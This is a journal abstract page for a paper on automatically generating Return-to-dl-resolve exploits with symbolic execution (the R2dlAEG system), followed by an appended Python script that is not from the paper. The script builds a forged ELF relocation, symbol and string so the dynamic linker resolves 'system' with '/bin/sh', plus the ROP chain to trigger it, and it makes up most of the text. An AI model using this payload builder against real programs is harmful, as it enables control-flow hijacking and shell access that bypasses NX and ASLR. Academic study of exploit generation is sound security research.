Computer Science (计算机科学) ›› 2019, Vol. 46 ›› Issue (2): 127-132. doi: 10.11896/j.issn.1002-137X.2019.02.020

• Information Security •

Automatic Return-to-dl-resolve Exploit Generation Method Based on Symbolic Execution

FANG Hao, WU Li-fa, WU Zhi-yong

  1. Institute of Command and Control Engineering, Army Engineering University of PLA, Nanjing 210000, China
  • Received: 2018-01-24 Online: 2019-02-25 Published: 2019-02-25
  • Corresponding author: WU Li-fa (born 1968), male, professor, doctoral supervisor; main research interest: network security. E-mail: wulifa@vip.163.com
  • About the authors: FANG Hao (born 1993), male, master's student; main research interest: cyberspace security. E-mail: cyyfh@qq.com. WU Zhi-yong (born 1982), male, Ph.D., associate professor; main research interest: software security.
  • Funding:
    This work was supported by the National Key R&D Program of China (2017YFB0802900).


Abstract (translated from the Chinese): Return-to-dl-resolve is a general exploitation technique that can defeat sophisticated protection mechanisms. Today it is carried out mainly by hand: the analyst has to study and understand the ELF dynamic-linking mechanism in depth, leak and resolve the address of an arbitrary library function, and assemble the attack payload, which is very inefficient. This paper proposes a method for automating Return-to-dl-resolve with symbolic execution. The method provides a symbolic execution environment for ELF executables, places constraints on the symbolic state at the program's crash point, and solves those constraints with a constraint solver; it is implemented as R2dlAEG, an automatic Return-to-dl-resolve exploit generation system. Experimental results show that R2dlAEG constructs exploits quickly and can hijack the program's control flow with NX and ASLR enabled at the same time.

Keywords: security protection mechanism, symbolic execution, exploit code, vulnerability exploitation

Abstract: Return-to-dl-resolve is a general exploitation technique for bypassing sophisticated protection mechanisms, but constructing its payload by hand is very inefficient. This paper studies the core concepts of ASLR, NX and Return-to-dl-resolve and builds a Return-to-dl-resolve model. The model provides a symbolic execution environment for ELF binaries and generates exploits by constraint solving; on top of it, a control-flow hijacking exploit generation system named R2dlAEG is implemented. Experimental results show that R2dlAEG generates exploits in acceptable time and that the generated exploits bypass both NX and ASLR.
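The abstract describes the manual part that R2dlAEG automates: laying out a forged relocation, symbol and string so that the dynamic linker itself resolves a library function (here `system`) without any leaked address. The following Python is an added example, not code from the paper or from R2dlAEG, that builds that second stage for a 32-bit non-PIE x86 ELF and then replays the lookups `_dl_fixup` performs to check the offsets are consistent. The section addresses (`SYMTAB`, `STRTAB`, `JMPREL`, `PLT0`) and the writable address `BSS` are hypothetical placeholders for values read from a real binary with `readelf -d`/`readelf -S`; it does not model the `.gnu.version` lookup, so on a binary with `DT_VERSYM` the chosen symbol index must additionally make `versym[sym_index]` land in mapped memory with a usable version index, and on x86-64 the structures are `Elf64_Rela`/`Elf64_Sym` and `reloc_arg` is an index rather than a byte offset.

```python
import struct

# ELF32 constants, as defined in <elf.h>
R_386_JMP_SLOT = 7
STB_GLOBAL = 1
STT_FUNC = 2
SIZEOF_ELF32_REL = 8    # Elf32_Rel: r_offset, r_info
SIZEOF_ELF32_SYM = 16   # Elf32_Sym: st_name, st_value, st_size, st_info, st_other, st_shndx


def elf32_rel(r_offset, sym_index, r_type=R_386_JMP_SLOT):
    """Pack a fake Elf32_Rel; ld.so recovers sym_index as r_info >> 8."""
    return struct.pack("<II", r_offset, (sym_index << 8) | r_type)


def elf32_sym(st_name):
    """Pack a fake Elf32_Sym: undefined (st_shndx = 0) global function, so
    _dl_fixup has to look the name up by hash in the loaded libraries."""
    st_info = (STB_GLOBAL << 4) | STT_FUNC
    return struct.pack("<IIIBBH", st_name, 0, 0, st_info, 0, 0)


def build_ret2dlresolve(symtab, strtab, rel_plt, data_addr, func_name, arg):
    """Lay out the forged Elf32_Rel, Elf32_Sym, symbol string and argument at
    data_addr (a known writable address, e.g. in .bss).
    Returns (blob, reloc_arg, layout)."""
    rel_addr = data_addr
    sym_addr = rel_addr + SIZEOF_ELF32_REL
    # _dl_fixup computes &symtab[sym_index], so the fake Elf32_Sym must lie at a
    # distance from DT_SYMTAB that is a multiple of sizeof(Elf32_Sym): pad to it.
    pad = (symtab - sym_addr) % SIZEOF_ELF32_SYM
    sym_addr += pad
    sym_index = (sym_addr - symtab) // SIZEOF_ELF32_SYM
    name_addr = sym_addr + SIZEOF_ELF32_SYM
    arg_addr = name_addr + len(func_name) + 1
    # r_offset is where ld.so stores the resolved address: use a spare
    # 4-aligned slot at the end of our own region so nothing else is clobbered.
    end = arg_addr + len(arg) + 1
    slot_addr = (end + 3) & ~3

    blob = elf32_rel(slot_addr, sym_index)
    blob += b"\x00" * pad
    blob += elf32_sym(name_addr - strtab)   # st_name is relative to DT_STRTAB
    blob += func_name + b"\x00"
    blob += arg + b"\x00"
    blob += b"\x00" * (slot_addr - end) + b"\x00" * 4
    reloc_arg = rel_addr - rel_plt          # i386: byte offset from DT_JMPREL
    layout = {"rel": rel_addr, "sym": sym_addr, "sym_index": sym_index,
              "name": name_addr, "arg": arg_addr, "slot": slot_addr}
    return blob, reloc_arg, layout


def build_chain(plt0, reloc_arg, arg_addr, fake_ret=0x41414141):
    """Stack words consumed after the hijacked return: PLT0 pushes link_map and
    jumps to _dl_runtime_resolve, which takes reloc_arg, resolves the symbol,
    pops both words and jumps to the target with [fake_ret][arg] as its frame."""
    return struct.pack("<IIII", plt0, reloc_arg, fake_ret, arg_addr)


def resolve_like_ld_so(blob, data_addr, symtab, strtab, rel_plt, reloc_arg):
    """Replay the pointer arithmetic _dl_fixup performs on the forged data and
    return (symbol name it would hash, r_offset). Only the forged region is
    modelled as memory; any read outside it is a layout bug."""
    def read(addr, n):
        off = addr - data_addr
        if not (0 <= off and off + n <= len(blob)):
            raise ValueError("read outside forged region: 0x%x" % addr)
        return blob[off:off + n]

    r_offset, r_info = struct.unpack("<II", read(rel_plt + reloc_arg, 8))
    if r_info & 0xFF != R_386_JMP_SLOT:
        raise ValueError("not an R_386_JMP_SLOT relocation")
    sym_index = r_info >> 8
    st_name = struct.unpack("<I", read(symtab + sym_index * SIZEOF_ELF32_SYM, 4))[0]
    name = b""
    while read(strtab + st_name + len(name), 1) != b"\x00":
        name += read(strtab + st_name + len(name), 1)
    return name, r_offset


if __name__ == "__main__":
    # Hypothetical section addresses of a non-PIE 32-bit ELF (constructed sample;
    # take the real ones from readelf -d / readelf -S).
    SYMTAB, STRTAB, JMPREL, PLT0 = 0x80481CC, 0x804822C, 0x8048298, 0x8048300
    BSS = 0x804A800  # writable, non-randomised address for the second stage
    blob, reloc_arg, layout = build_ret2dlresolve(
        SYMTAB, STRTAB, JMPREL, BSS, b"system", b"/bin/sh")
    chain = build_chain(PLT0, reloc_arg, layout["arg"])
    name, slot = resolve_like_ld_so(blob, BSS, SYMTAB, STRTAB, JMPREL, reloc_arg)
    print("reloc_arg=0x%x sym_index=%d ld.so would resolve %r into 0x%x"
          % (reloc_arg, layout["sym_index"], name, slot))
    print("stage 2 (%d bytes) -> 0x%x, ROP chain: %s" % (len(blob), BSS, chain.hex()))
```

The replay step is the check worth keeping: if padding or a section address is off by even one byte, the name `ld.so` would hash is garbage and the failure is a silent lookup error at run time rather than an obvious crash.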


CLC number: TP309